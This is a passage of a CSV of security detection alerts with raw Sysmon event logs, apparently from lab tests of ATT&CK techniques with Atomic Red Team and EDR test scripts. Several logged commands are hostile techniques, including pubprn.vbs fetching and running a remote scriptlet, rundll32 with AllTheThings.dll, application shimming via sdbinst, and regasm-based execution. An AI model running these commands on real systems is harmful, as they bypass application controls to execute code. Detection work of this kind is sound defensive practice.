<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ParentProcessId"">6836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:47.124363Z"">
</TimeCreated>
<EventRecordID>1966449</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:47.054</Data>
<Data Name=""ProcessGuid"">365ABB72-569F-5C91-0000-001012610800</Data>
<Data Name=""ProcessId"">2548</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
</TimeCreated>
<EventRecordID>4967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ProcessId"">912</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ParentProcessId"">6836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
</TimeCreated>
<EventRecordID>4967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ProcessId"">912</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
<Data Name=""ParentProcessId"">6836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:26.364512Z"">
</TimeCreated>
<EventRecordID>1966444</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:26.194</Data>
<Data Name=""ProcessGuid"">365ABB72-568A-5C91-0000-0010D24B0800</Data>
<Data Name=""ProcessId"">4072</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:45.606737Z"">
</TimeCreated>
<EventRecordID>5006</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:45.524</Data>
<Data Name=""ProcessGuid"">747F3D96-6675-5D3F-0000-0010875C8F00</Data>
<Data Name=""ProcessId"">4036</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6675-5D3F-0000-0010AA498F00</Data>
<Data Name=""ParentProcessId"">4184</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;del T1121.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:56.033241Z"">
</TimeCreated>
<EventRecordID>3615</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:56.002</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A4-5D31-0000-0010C9C22900</Data>
<Data Name=""ProcessId"">6804</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;del T1121.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.681219Z"">
</TimeCreated>
<EventRecordID>3613</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.672</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-001081B22900</Data>
<Data Name=""ProcessId"">5800</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:25.933892Z"">
</TimeCreated>
<EventRecordID>1966429</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:25.853</Data>
<Data Name=""ProcessGuid"">365ABB72-5689-5C91-0000-0010543F0800</Data>
<Data Name=""ProcessId"">3896</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.105804Z"">
</TimeCreated>
<EventRecordID>3611</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.057</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010F2A42900</Data>
<Data Name=""ProcessId"">4784</Data>
<Data Name=""Image"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</Data>
<Data Name=""FileVersion"">4.7.3190.0 built by: NET472REL1LAST_C</Data>
<Data Name=""Description"">Visual C# Command Line Compiler</Data>
<Data Name=""Product"">Microsoft® .NET Framework</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
<Data Name=""ParentProcessId"">6748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot; ) contain suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.034352Z"">
</TimeCreated>
<EventRecordID>3610</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.023</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
<Data Name=""ProcessId"">6748</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
